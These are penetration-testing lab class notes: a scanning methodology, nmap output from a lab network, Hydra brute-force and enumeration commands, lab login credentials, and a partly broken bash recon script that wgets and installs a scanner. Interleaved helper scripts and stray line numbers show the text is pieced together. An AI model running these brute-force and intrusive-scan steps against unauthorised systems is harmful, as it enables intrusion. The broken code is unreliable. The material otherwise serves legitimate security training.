Nov 07, 2019, 12:10 AM
The purpose of this class is to help students learn how to address the common issues in Hacking Challenge Lab courses.


Issue 1. Lack of a thorough attack process
==========================================
 - Host discovery
 - Service discovery
 - Service version discovery
 - Vulnerability research
 - Linux (port 111)/Windows (port 445) enumeration
 - Webserver vulnerability scan
 - Directory brute force every webserver
 - Analyze source code of every web app (look for IPs, usernames/passwords, explanations of how stuff works)
 - Brute force all services


Issue 2. Lack of automation of the process
==========================================
 - Research attack scripts on the internet to enhance your methodology


Issue 3. Failing to document all steps being performed and their output
=======================================================================


Issue 4. Lack of sleep during the exam
======================================


Issue 5. Failing to reboot target machines prior to attack
==========================================================



--------------------------------------------------------------------------------------------------------------


A good strategy to use to prepare would be:

Step 1. Ensure that you are comfortable with Linux
--------------------------------------------------
- LinuxSurvival.com (you should be able to comfortably pass all 4 quizzes)
- CompTIA Linux+ (you should be just a hair under a Linux system administrator in skill level, able to do simple shell scripting, and well beyond a Linux user skill level)

You should be very comfortable with the material covered in the videos below (go through all of them twice if you are new to Linux):
https://www.youtube.com/playlist?list=PLCDA423AB5CEC8FDB
https://www.youtube.com/playlist?list=PLtK75qxsQaMLZSo7KL-PmiRarU7hrpnwK
https://www.youtube.com/playlist?list=PLcUid3OP_4OXOUqYTDGjq-iEwtBf-3l2E



Step 2. You should be comfortable with the following tools:
------------------------------------------------------------

Nmap:
https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBsINfLVidNVaZ-7_v1NJIo

Metasploit:
https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBmwvjJoWhM4Lg5MceSbsja

Burp Suite:
https://www.youtube.com/playlist?list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV

Sqlmap:
https://www.youtube.com/playlist?list=PLA3E1E7A07FD60C75

Nikto:
https://www.youtube.com/watch?v=GH9qn_DBzCk

Enum4Linux:
https://www.youtube.com/watch?v=hA5raaGOQKQ

RPCINFO/SHOWMOUNT:
https://www.youtube.com/watch?v=FlRAA-1UXWQ

Hydra:
https://www.youtube.com/watch?v=rLtj8tEmGso



Step 3. You need to be comfortable with basic exploit development
-----------------------------------------------------------------

Basic assembly:
https://www.youtube.com/playlist?list=PLue5IPmkmZ-P1pDbF3vSQtuNquX0SZHpB

Basic exploit development (first 5 videos in the playlist):
https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl


Step 4. You need to be comfortable with privilege escalation
------------------------------------------------------------
Linux
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Windows
https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
http://www.fuzzysecurity.com/tutorials/16.html




#################################
# Day 1: Advanced Scanning Labs #
#################################


########################
# Scanning Methodology #
########################

- Ping Sweep
What's alive?
-------------

---------------------------Type This-----------------------------------
sudo nmap -sP 157.166.226.*

-----------------------------------------------------------------------



 - If -sP yields no results, try:
---------------------------Type This-----------------------------------
sudo nmap -sL 157.166.226.*

-----------------------------------------------------------------------



 - Look for hostnames:
---------------------------Type This-----------------------------------
sudo nmap -sL 157.166.226.* | grep com

-----------------------------------------------------------------------



- Port Scan
What's where?
-------------
---------------------------Type This-----------------------------------
sudo nmap -sS 162.243.126.247

-----------------------------------------------------------------------



- Bannergrab/Version Query
What versions of software are running?
--------------------------------------

---------------------------Type This-----------------------------------
sudo nmap -sV 162.243.126.247

-----------------------------------------------------------------------




- Vulnerability Research
Look up the banner versions for public exploits
-----------------------------------------------
http://exploit-db.com
http://securityfocus.com/bid
https://packetstormsecurity.com/files/tags/exploit/





--------------------------------------------------------------------------------------------------------------
Some tools to install:
---------------------------Type This-----------------------------------
wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
gcc propecia.c -o propecia
sudo cp propecia /bin
-----------------------------------------------------------------------








- I prefer to use PuTTY to SSH into my Linux host.
- You can download PuTTY from here:
- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

Here is the information to put into PuTTY:


ip address: 149.28.201.171
username: labpentest
password: lab!network@attack!



##############################
# Scanning Process to follow #
##############################

Step 1: Host Discovery
----------------------

---------------------------Type This-----------------------------------
nmap -sP 172.31.2.0/24

nmap -sL 172.31.2.0/24

nmap -sS --open -p 22,445 172.31.2.0/24

propecia 172.31.2 22 > file1
propecia 172.31.2 445 > file2
cat file1 file2 > file3
cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt
cat lab.txt
-----------------------------------------------------------------------


Step 2: Port Scan
-----------------
nmap -sS <IP-ADDRESS>
nmap -sU -p 69,161 <IP-ADDRESS>


---------------------------Type This-----------------------------------
sudo nmap -sS 172.31.2.0/24
sudo nmap -sU -p 69,161 172.31.2.0/24
-----------------------------------------------------------------------


Step 3: Bannergrab
------------------
nmap -sV <IP-ADDRESS>
nmap -sV -p- <IP-ADDRESS>
 |
 ----> Vulnerability Research

---------------------------Type This-----------------------------------
sudo nmap -sV 172.31.2.0/24
-----------------------------------------------------------------------




Step 4: Enumerate common Windows/Linux file sharing services
------------------------------------------------------------
Step 3 is where most people STOP; you need to move on and look deeper.

---------------------------Type This-----------------------------------
sudo apt install smbclient libnss-winbind winbind
git clone https://github.com/portcullislabs/enum4linux.git
cd enum4linux/
perl enum4linux.pl -U 172.31.2.11

nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 172.31.2.86
-----------------------------------------------------------------------



Step 5: Vulnerability scan the webservers
-----------------------------------------
git clone https://github.com/sullo/nikto.git Nikto2

cd Nikto2/program

perl nikto.pl -h <IP-ADDRESS>



Step 6: Directory brute force every webserver
---------------------------------------------
sudo apt install -y libcurl4-openssl-dev

git clone https://github.com/v0re/dirb.git

cd dirb/

./configure

make

./dirb

./dirb http://<IP-ADDRESS> wordlists/big.txt





Step 7: Analyze source code of all webpages found
-------------------------------------------------
lynx -dump "http://<IP-ADDRESS>" | grep -o "http:.*" > links

If you ever need to download an entire Web site, perhaps for off-line viewing, wget can do the job. For example:

$ wget \
 --recursive \
 --no-clobber \
 --page-requisites \
 --html-extension \
 --convert-links \
 --restrict-file-names=windows \
 --domains website.org \
 --no-parent \
 www.website.org/tutorials/html/


This command downloads the Web site www.website.org/tutorials/html/.

The options are:

--recursive: download the entire Web site.

--domains website.org: don't follow links outside website.org.

--no-parent: don't follow links outside the directory tutorials/html/.

--page-requisites: get all the elements that compose the page (images, CSS and so on).

--html-extension: save files with the .html extension.

--convert-links: convert links so that they work locally, off-line.

--restrict-file-names=windows: modify filenames so that they will work in Windows as well.

--no-clobber: don't overwrite any existing files (used in case the download is interrupted and resumed).
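
An offline version of the Step 7 link extraction, added here as an example and not part of the class notes: instead of `lynx -dump | grep -o "http:.*"` against a live host, it works on a page already saved to disk (for instance by the wget mirror above) and pulls out the absolute links plus any IPv4 literals left in the source, which is exactly what Step 7 says to look for. It assumes a grep with `-o`/`-E` and a sed with `-E` (GNU or BSD); the HTML it scans is constructed for the example, including the hostnames in it.

```shell
#!/bin/sh
# Added example (not from the class notes): offline equivalent of
#   lynx -dump "http://<IP-ADDRESS>" | grep -o "http:.*" > links
# run over a saved page. The HTML below is constructed for the example.

# extract_links <file>: absolute http(s) URLs from href= and src= attributes,
# deduplicated; relative links are left to the crawler/wget mirror
extract_links() {
    LC_ALL=C grep -oiE '(href|src)="https?://[^"]+"' "$1" \
        | sed -E 's/^[^"]*"//; s/"$//' \
        | LC_ALL=C sort -u
}

# extract_ipv4 <file>: dotted-quad literals anywhere in the page, HTML comments
# and inline JavaScript included, since that is where such leaks usually hide
extract_ipv4() {
    LC_ALL=C grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' "$1" | LC_ALL=C sort -u
}

# Constructed sample page (the hosts and paths are made up for the example)
write_sample_page() {
    tmp=$(mktemp)
    cat > "$tmp" <<'EOF'
<html><head>
<link rel="stylesheet" href="http://www.website.org/css/site.css">
</head><body>
<!-- TODO: point this at 172.31.2.86 before go-live -->
<a href="http://www.website.org/tutorials/html/intro.html">Intro</a>
<a HREF="https://cdn.example.net/lib.js">lib</a>
<script src="http://www.website.org/js/app.js"></script>
<a href="/relative/path">relative links are left to the crawler</a>
</body></html>
EOF
    echo "$tmp"
}

page=$(write_sample_page)
echo "--- absolute links ---"
extract_links "$page"
echo "--- ipv4 literals ---"
extract_ipv4 "$page"
rm -f "$page"
```

Running it on the sample prints four absolute URLs (the relative `/relative/path` is skipped) and the single address hidden in the HTML comment; `LC_ALL=C` keeps the sort order and byte-level matching independent of the machine's locale.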
332
333
334
Step 8: Brute force any services you find
-----------------------------------------
sudo apt install -y zlib1g-dev libssl-dev libidn11-dev libcurses-ocaml-dev libpcre3-dev libpq-dev libsvn-dev libssh-dev libmysqlclient-dev
cd ~/toolz
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra
./configure
make
hydra -L username.txt -P passlist.txt ftp://<IP-ADDRESS>
hydra -l user -P passlist.txt ftp://<IP-ADDRESS>
344
345
346
347##################
348# Host Discovery #
349##################
350
351Reason:
352-------
353You have to discover the reachable hosts in the network before you can attack them.
354
355
356Hosts discovery syntax:
357-----------------------
358 nmap -sP 172.31.2.0/24
359 propecia 172.31.2 22 > file1
360 propecia 172.31.2 445 > file2
361 cat file1 file2 > file3
362 cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt
363 cat lab.txt
364
365Issues:
366-------
367Issue we had to deal with was hosts that didn't respond to ICMP
368
369
370 Hosts discovered:
371 -----------------
372 172.31.2.11
373 172.31.2.14
374 172.31.2.47
375 172.31.2.64
376 172.31.2.86
377 172.31.2.117
378 172.31.2.157
379 172.31.2.217
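
The merge step of the host discovery syntax above (also used in Step 1 of the scanning process), as an added example that is not part of the class notes: a POSIX shell function that combines per-port hit lists into one deduplicated, numerically sorted host list. It assumes each input file holds one IPv4 address per line, which is what the propecia redirects produce; the two sample lists are constructed for the example and are not lab output.

```shell
#!/bin/sh
# Added example (not from the class notes): merge per-port hit lists into one
# deduplicated, numerically sorted host list, the job done in the notes by
#   cat file1 file2 > file3; cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt
# Assumption: each input file holds one IPv4 address per line.

merge_hosts() {
    # keep only dotted quads, then sort numerically on every octet so that
    # 172.31.2.14 lands before 172.31.2.117 (a plain text sort would not);
    # -u drops duplicates after sorting, which `uniq` would also do but only
    # for adjacent lines, so the sort has to come first either way
    cat "$@" | grep -E '^[0-9]{1,3}(\.[0-9]{1,3}){3}$' \
        | sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n -u
}

# Constructed sample input standing in for file1 (port 22 hits) and
# file2 (port 445 hits); the overlap (.11 and .86) is what the dedup removes,
# and the empty trailing line in file2 is filtered out by the grep
demo_merge() {
    dir=$(mktemp -d)
    printf '172.31.2.117\n172.31.2.47\n172.31.2.86\n172.31.2.11\n' > "$dir/file1"
    printf '172.31.2.86\n172.31.2.11\n172.31.2.14\n\n' > "$dir/file2"
    merge_hosts "$dir/file1" "$dir/file2"
    rm -rf "$dir"
}

demo_merge
```

With the sample lists this prints five hosts in the order .11, .14, .47, .86, .117. Hosts that ignore ICMP still show up as long as one of the TCP probes hit them, because the merge only cares about which lists an address appears in, not which probe produced it.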
380 172.31.2.238
381
382
383
384
385
386
387#####################
388# Service Discovery #
389#####################
390
391Reason:
392-------
393Identifying what services are running on what hosts allows for you to map the network topology.
394
395
396
397Port Scan syntax:
398 sudo nmap -sS -Pn -iL lab.txt
399 sudo nmap -sU -p69,161 -Pn -iL lab.txt
400
401
402
403Services discovered:
404--------------------
405
406joe@metasploit-box:~$ sudo nmap -sS -Pn -iL lab.txt
407
408Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:52 UTC
409Nmap scan report for 172.31.2.11
410Host is up (0.087s latency).
411Not shown: 995 filtered ports
412PORT STATE SERVICE
41321/tcp open ftp
414139/tcp open netbios-ssn
415445/tcp open microsoft-ds
4163389/tcp open ms-wbt-server
4179999/tcp open abyss
418
419Nmap scan report for 172.31.2.11
420Host is up.
421
422PORT STATE SERVICE
42369/udp open|filtered tftp
424161/udp open|filtered snmp
425
426
427Nmap scan report for 172.31.2.14
428Host is up (0.087s latency).
429Not shown: 995 filtered ports
430PORT STATE SERVICE
43121/tcp open ftp
432139/tcp open netbios-ssn
433445/tcp open microsoft-ds
4343389/tcp open ms-wbt-server
4359999/tcp open abyss
436
437
438Nmap scan report for 172.31.2.14
439Host is up.
440
441PORT STATE SERVICE
44269/udp open|filtered tftp
443161/udp open|filtered snmp
444
445
446Nmap scan report for 172.31.2.47
447Host is up (0.086s latency).
448Not shown: 998 closed ports
449PORT STATE SERVICE
45022/tcp open ssh
45180/tcp open http
452
453Nmap scan report for 172.31.2.64
454Host is up (0.087s latency).
455Not shown: 997 closed ports
456PORT STATE SERVICE
45722/tcp open ssh
45880/tcp open http
4596667/tcp open irc
460
461Nmap scan report for 172.31.2.86
462Host is up (0.086s latency).
463Not shown: 989 closed ports
464PORT STATE SERVICE
46522/tcp open ssh
46653/tcp open domain
46780/tcp open http
468110/tcp open pop3
469111/tcp open rpcbind
470139/tcp open netbios-ssn
471143/tcp open imap
472445/tcp open microsoft-ds
473993/tcp open imaps
474995/tcp open pop3s
4758080/tcp open http-proxy
476
477Nmap scan report for 172.31.2.117
478Host is up (0.087s latency).
479Not shown: 997 closed ports
480PORT STATE SERVICE
48122/tcp open ssh
48280/tcp open http
4832020/tcp open xinupageserver
484
485Nmap scan report for 172.31.2.157
486Host is up (0.087s latency).
487Not shown: 997 closed ports
488PORT STATE SERVICE
48921/tcp open ftp
49022/tcp open ssh
49180/tcp open http
492
493Nmap scan report for 172.31.2.217
494Host is up (0.087s latency).
495Not shown: 997 closed ports
496PORT STATE SERVICE
49722/tcp open ssh
49880/tcp open http
4993260/tcp open iscsi
500
501Nmap scan report for 172.31.2.238
502Host is up (0.087s latency).
503Not shown: 997 closed ports
504PORT STATE SERVICE
50522/tcp open ssh
50680/tcp open http
5076969/tcp open acmsoda
508
509Nmap done: 9 IP addresses (9 hosts up) scanned in 14.82 seconds
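
Issue 3 above is about documenting every step and its output; a listing like the one just shown is much easier to keep, diff between scans and feed into later steps when it is reduced to one line per open port. The following is an added example, not part of the class notes: an awk-based reducer for nmap's normal (human-readable) output, plus a helper that answers "which hosts have port X open". It assumes the default nmap output format; the excerpt it parses is constructed in the shape of the class output (one report header with a made-up hostname, and one UDP open|filtered line that must be skipped).

```shell
#!/bin/sh
# Added example (not part of the class notes): reduce nmap normal output to one
# "ip<TAB>port/proto<TAB>service" line per open port. Assumption: input is the
# default human-readable nmap output; "open|filtered" guesses are left out on
# purpose so the inventory only lists ports that are definitely open.

nmap_open_ports() {
    awk '
        # a report header starts a new host; strip the "(...)" around the IP
        # when nmap prints a hostname first
        /^Nmap scan report for / { ip = $NF; gsub(/[()]/, "", ip); next }
        # port lines look like "445/tcp open microsoft-ds"; only state "open" counts
        $1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" { print ip "\t" $1 "\t" $3 }
    ' "$@"
}

# hosts_with_port <port> <scanfile>: which hosts expose a given TCP port
hosts_with_port() {
    nmap_open_ports "$2" | awk -F '\t' -v want="$1/tcp" '$2 == want { print $1 }' | sort -u
}

# Constructed excerpt in the shape of the class listing (hostname is made up)
write_sample_scan() {
    tmp=$(mktemp)
    cat > "$tmp" <<'EOF'
Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:52 UTC
Nmap scan report for 172.31.2.11
Host is up (0.087s latency).
Not shown: 995 filtered ports
PORT     STATE SERVICE
21/tcp   open  ftp
445/tcp  open  microsoft-ds
9999/tcp open  abyss

Nmap scan report for 172.31.2.11
Host is up.

PORT    STATE         SERVICE
69/udp  open|filtered tftp

Nmap scan report for sedna.lab.example (172.31.2.86)
Host is up (0.086s latency).
PORT    STATE SERVICE
22/tcp  open  ssh
445/tcp open  microsoft-ds
EOF
    echo "$tmp"
}

scan=$(write_sample_scan)
nmap_open_ports "$scan"
echo "--- hosts with 445/tcp open ---"
hosts_with_port 445 "$scan"
rm -f "$scan"
```

On the sample this yields five open-port lines (three for .11, two for .86), skips the tftp open|filtered guess, and reports .11 and .86 as the hosts with 445/tcp open, which is the list Step 4 (SMB enumeration) would start from.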
510
511
512
513
514
515
516
517
518
519##############################################
520# Service Version Discovery (Bannergrabbing) #
521##############################################
522Reason:
523-------
524Identifying what versions of services are running on what hosts allows for you to determine if the hosts are vulnerable to attack.
525
526
527
528Port Scan syntax:
529
530joe@metasploit-box:~$ sudo nmap -sV -Pn -iL lab.txt
531
532Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:56 UTC
533Nmap scan report for 172.31.2.11
534Host is up (0.087s latency).
535Not shown: 995 filtered ports
536PORT STATE SERVICE VERSION
53721/tcp open ftp FreeFloat ftpd 1.00
538139/tcp open netbios-ssn Microsoft Windows netbios-ssn
539445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
5403389/tcp open ms-wbt-server Microsoft Terminal Service
5419999/tcp open abyss?
542Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
543
544Nmap scan report for 172.31.2.14
545Host is up (0.087s latency).
546Not shown: 995 filtered ports
547PORT STATE SERVICE VERSION
54821/tcp open ftp FreeFloat ftpd 1.00
549139/tcp open netbios-ssn Microsoft Windows netbios-ssn
550445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
5513389/tcp open ms-wbt-server Microsoft Terminal Service
5529999/tcp open abyss?
553Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
554
555Nmap scan report for 172.31.2.47
556Host is up (0.087s latency).
557Not shown: 998 closed ports
558PORT STATE SERVICE VERSION
55922/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
56080/tcp open http Apache httpd 2.2.22 ((Ubuntu))
561Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
562
563Nmap scan report for 172.31.2.64
564Host is up (0.087s latency).
565Not shown: 997 closed ports
566PORT STATE SERVICE VERSION
56722/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
56880/tcp open http Apache httpd 2.4.7 ((Ubuntu))
5696667/tcp open irc ngircd
570Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
571
572Nmap scan report for 172.31.2.86
573Host is up (0.087s latency).
574Not shown: 989 closed ports
575PORT STATE SERVICE VERSION
57622/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
57753/tcp open domain ISC BIND 9.9.5-3 (Ubuntu Linux)
57880/tcp open http Apache httpd 2.4.7 ((Ubuntu))
579110/tcp open pop3 Dovecot pop3d
580111/tcp open rpcbind 2-4 (RPC #100000)
581139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
582143/tcp open imap Dovecot imapd (Ubuntu)
583445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
584993/tcp open ssl/imap Dovecot imapd (Ubuntu)
585995/tcp open ssl/pop3 Dovecot pop3d
5868080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
587Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel, cpe:/o:campmoca;:ubuntu_linux
588
589Nmap scan report for 172.31.2.117
590Host is up (0.086s latency).
591Not shown: 997 closed ports
592PORT STATE SERVICE VERSION
59322/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
59480/tcp open http Apache httpd 2.4.7 ((Ubuntu))
5952020/tcp open ftp vsftpd 2.0.8 or later
596Service Info: Host: minotaur; OS: Linux; CPE: cpe:/o:linux:linux_kernel
597
598Nmap scan report for 172.31.2.157
599Host is up (0.086s latency).
600Not shown: 997 closed ports
601PORT STATE SERVICE VERSION
60221/tcp open ftp vsftpd 2.0.8 or later
60322/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
60480/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
605
606Nmap scan report for 172.31.2.217
607Host is up (0.087s latency).
608Not shown: 997 closed ports
609PORT STATE SERVICE VERSION
61022/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
61180/tcp open http nginx
6123260/tcp open iscsi?
613Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
614
615Nmap scan report for 172.31.2.238
616Host is up (0.087s latency).
617Not shown: 997 closed ports
618PORT STATE SERVICE VERSION
61922/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
62080/tcp open http nginx 1.6.2
6216969/tcp open acmsoda?
622Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
623
624Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
625Nmap done: 9 IP addresses (9 hosts up) scanned in 170.68 seconds
626
627
628
629
630
631
632
633-----------------------------------------------------------------------------------------------------------------------------
634-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
635-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
636--------------------------------------------------------------------------------------
637
638#!/bin/bash
639
640# Script made during the CyberWar class for the students to play with, debug, and improve.
641# Take a look at the following websites for ideas:
642# https://github.com/commonexploits/port-scan-automation
643# https://www.commonexploits.com/penetration-testing-scripts/
644# https://github.com/averagesecurityguy/scripts
645# https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
646
647
648
649# Some thoughts of things to add to this script:
650# Shodan queries (API key)
651# AWS scanning (need credentials)
652# Jenkins scanning
653# Active Directory enumeration
654# Github scanning (API key required)
655# Blockchain platforms
656
657
658
659
660
661
662
663#############################################
664# Check to see if script is running as root #
665#############################################
666if [ "$EUID" -ne 0 ]
667 then echo "Please run as root"
668 exit
669fi
670
671
672####################################
673# Check to see if gcc is installed #
674####################################
675file1="/usr/bin/gcc"
676if [ -f "$file1" ]
677then
678 echo "$file is installed."
679 clear
680else
681 echo "$file not found."
682 echo Installing gcc
683 apt-get install -y gcc
684 clear
685fi
686
687########################
688# Make the directories #
689########################
690cd /tmp
691rm -rf customerAudit/
692rm -rf NetworkAudit/
693mkdir -p /tmp/NetworkAudit/discovered_services/
694mkdir -p /tmp/NetworkAudit/scan/windows/
695mkdir -p /tmp/NetworkAudit/scan/sunrpc/
696mkdir -p /tmp/NetworkAudit/scan/ssh/
697mkdir -p /tmp/NetworkAudit/scan/ftp/
698mkdir -p /tmp/NetworkAudit/scan/http/
699mkdir -p /tmp/NetworkAudit/scan/telnet/
700mkdir -p /tmp/NetworkAudit/scan/pop3/
701mkdir -p /tmp/NetworkAudit/scan/printers/
702mkdir -p /tmp/NetworkAudit/scan/mssql_databases/
703mkdir -p /tmp/NetworkAudit/scan/oracle_databases/
704mkdir -p /tmp/NetworkAudit/scan/mysql_databases/
705mkdir -p /tmp/NetworkAudit/scan/mongodb_databases/
706
707
708#####################
709# Download propecia #
710#####################
711file2="/bin/propecia"
712if [ -f "$file2" ]
713then
714 echo "$file is installed."
715 clear
716else
717 echo "$file not found."
718 echo Installing propecia
719 cd /tmp
720 wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
721 gcc propecia.c -o propecia
722 cp propecia /bin
723fi
724
725######################
726# Find Windows Hosts #
727######################
728clear
729echo "Scanning for windows hosts."
730propecia 172.31.2 445 >> /tmp/NetworkAudit/discovered_services/windows_hosts
731clear
732echo "Done scanning for windows hosts. FTP is next."
733
734
735##################
736# Find FTP Hosts #
737##################
738echo "Scanning for hosts running FTP."
739propecia 172.31.2 21 >> /tmp/NetworkAudit/discovered_services/ftp_hosts
740clear
741echo "Done scanning for FTP hosts. SSH is next."
742
743##################
744# Find SSH Hosts #
745##################
746echo "Scanning for hosts running SSH."
747propecia 172.31.2 22 >> /tmp/NetworkAudit/discovered_services/ssh_hosts
748clear
749echo "Done scanning for SSH hosts. POP3 is next."
750
751
752###################
753# Find POP3 Hosts #
754###################
755echo "Scanning for hosts running POP3."
756propecia 172.31.2 110 >> /tmp/NetworkAudit/discovered_services/pop3_hosts
757clear
758echo "Done scanning for POP3 hosts. SunRPC is next."
759
760
761#####################
762# Find SunRPC Hosts #
763#####################
764echo "Scanning for hosts running SunRPC."
765propecia 172.31.2 111 >> /tmp/NetworkAudit/discovered_services/sunrpc_hosts
766clear
767echo "Done scanning for SunRPC hosts. Telnet is next."
768
769
770#####################
771# Find Telnet Hosts #
772#####################
773echo "Scanning for hosts running Telnet."
774propecia 172.31.2 23 >> /tmp/NetworkAudit/discovered_services/telnet_hosts
775clear
776echo "Done scanning for Telnet hosts. HTTP is next."
777
778
779###################
780# Find HTTP Hosts #
781###################
782echo "Scanning for hosts running HTTP"
783propecia 172.31.2 80 >> /tmp/NetworkAudit/discovered_services/http_hosts
784clear
785echo "Done scanning for HTTP hosts. HTTPS hosts are next."
786
787
788###################
789# Find HTTPS Hosts #
790###################
791echo "Scanning for hosts running HTTP"
792propecia 172.31.2 443 >> /tmp/NetworkAudit/discovered_services/https_hosts
793clear
794echo "Done scanning for HTTPS hosts. Databases are next."
795
796
797##################
798# Find Databases #
799##################
800echo "Scanning for hosts running MS SQL Server"
801propecia 172.31.2 1433 >> /tmp/NetworkAudit/discovered_services/mssql_hosts
802clear
803
804echo "Scanning for hosts running Oracle"
805propecia 172.31.2 1521 >> /tmp/NetworkAudit/discovered_services/oracle_hosts
806clear
807
808echo "Scanning for hosts running Postgres"
809propecia 172.31.2 5432 >> /tmp/NetworkAudit/discovered_services/postgres_hosts
810clear
811
812echo "Scanning for hosts running MongoDB"
813propecia 172.31.2 27017 >> /tmp/NetworkAudit/discovered_services/mongodb_hosts
814clear
815
816echo "Scanning for hosts running MySQL"
817propecia 172.31.2 3306 >> /tmp/NetworkAudit/discovered_services/mysql_hosts
818clear
819echo "Done doing the host discovery. Moving on to nmap'ing each host discovered. Windows hosts are first."
820
821
822###############################
823# Ok, let's do the NMAP files #
824###############################
825clear
826# Windows
827for x in `cat /tmp/NetworkAudit/discovered_services/windows_hosts` ; do nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect $x > /tmp/NetworkAudit/scan/windows/$x ; done
828echo "Done with Windows."
829
830clear
831# FTP
832for x in `cat /tmp/NetworkAudit/discovered_services/ftp_hosts` ; do nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor $x > /tmp/NetworkAudit/scan/ftp/$x ; done
833echo "Done with FTP."
834
835clear
836# SSH
837for x in `cat /tmp/NetworkAudit/discovered_services/ssh_hosts` ; do nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos $x > /tmp/NetworkAudit/scan/ssh/$x ; done
838echo "Done with SSH."
839
840clear
841# SUNRPC
842for x in `cat /tmp/NetworkAudit/discovered_services/sunrpc_hosts` ; do nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo $x > /tmp/NetworkAudit/scan/sunrpc/$x ; done
843echo "Done with SunRPC."
844
845clear
846# POP3
847for x in `cat /tmp/NetworkAudit/discovered_services/pop3_hosts` ; do nmap -Pn -n --open -p110 --script=banner,pop3-capabilities,pop3-ntlm-info,ssl*,tls-nextprotoneg $x > /tmp/NetworkAudit/scan/pop3/$x ; done
848echo "Done with POP3."
849
850# clear
851# HTTP Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
852# as a good reference for what nmap nse scripts to run against port 80 and 443
853# for x in `cat /tmp/NetworkAudit/discovered_services/http_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script-args=unsafe --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/http/$x ; done
854# echo "Done with HTTP."
855
856
857# clear
858# HTTP Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
859# as a good reference for what nmap nse scripts to run against port 80 and 443
860# for x in `cat /tmp/NetworkAudit/discovered_services/https_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script-args=unsafe --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/http/$x ; done
861# echo "Done with HTTP."
862
863
864clear
865# SQL Servers
866for x in `cat /tmp/NetworkAudit/discovered_services/mssql_hosts` ; do -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info $x > /tmp/NetworkAudit/scan/mssql_databases/$x ; done
867echo "Done with MS SQL."
868
869clear
870# Oracle Servers
871# FIX THIS: needs brute force wordlists for this to run correctly
872# for x in `cat /tmp/NetworkAudit/discovered_services/oracle_hosts` ; do nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt $x >> /tmp/NetworkAudit/scan/oracle_databases/$x ; done
873# echo "Done with Oracle."
874
875clear
876# MongoDB
877for x in `cat /tmp/NetworkAudit/discovered_services/mongodb_hosts` ; do nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info $x > /tmp/NetworkAudit/scan/mongodb_databases/$x ; done
